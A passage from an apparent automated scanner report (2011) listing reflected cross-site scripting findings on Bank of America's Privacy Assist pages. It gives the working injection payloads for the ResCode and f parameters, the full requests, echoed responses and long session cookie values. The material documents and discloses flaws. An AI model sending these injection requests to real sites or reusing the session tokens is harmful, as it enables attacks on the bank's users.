ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23060
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:59:14 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:59:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_IN_IForgotMyUserID.asp" href="https://privacyassist.bankofamerica.com/home.asp?FailureLogon=WrongUserID&ResCode=-3470d9e"><a>8919691e5db">
...[SNIP]...

1.25. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the ResCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e748"-alert(1)-"298c144dd71 was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserID&ResCode=-345e748"-alert(1)-"298c144dd71 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23116
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:59:42 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:59:42 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserID&ResCode=-345e748"-alert(1)-"298c144dd71";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.26. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the ResCode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce689'-alert(1)-'e07cb30159a was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserID&ResCode=-34ce689'-alert(1)-'e07cb30159a HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23116
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:59:51 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:59:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?FailureLogon=WrongUserID&ResCode=-34ce689'-alert(1)-'e07cb30159a';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
                           var
...[SNIP]...

1.27. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/In_Activation.asp

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 511bf"-alert(1)-"872f1041297 was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/In_Activation.asp?f=elert511bf"-alert(1)-"872f1041297 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31289
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:17:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "f=elert511bf"-alert(1)-"872f1041297";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.28. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [f parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/In_Activation.asp

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef75d"><a%20b%3dc>a7d6a6016d9 was submitted in the f parameter. This input was echoed as ef75d"><a b=c>a7d6a6016d9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/In_Activation.asp?f=elertef75d"><a%20b%3dc>a7d6a6016d9 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPu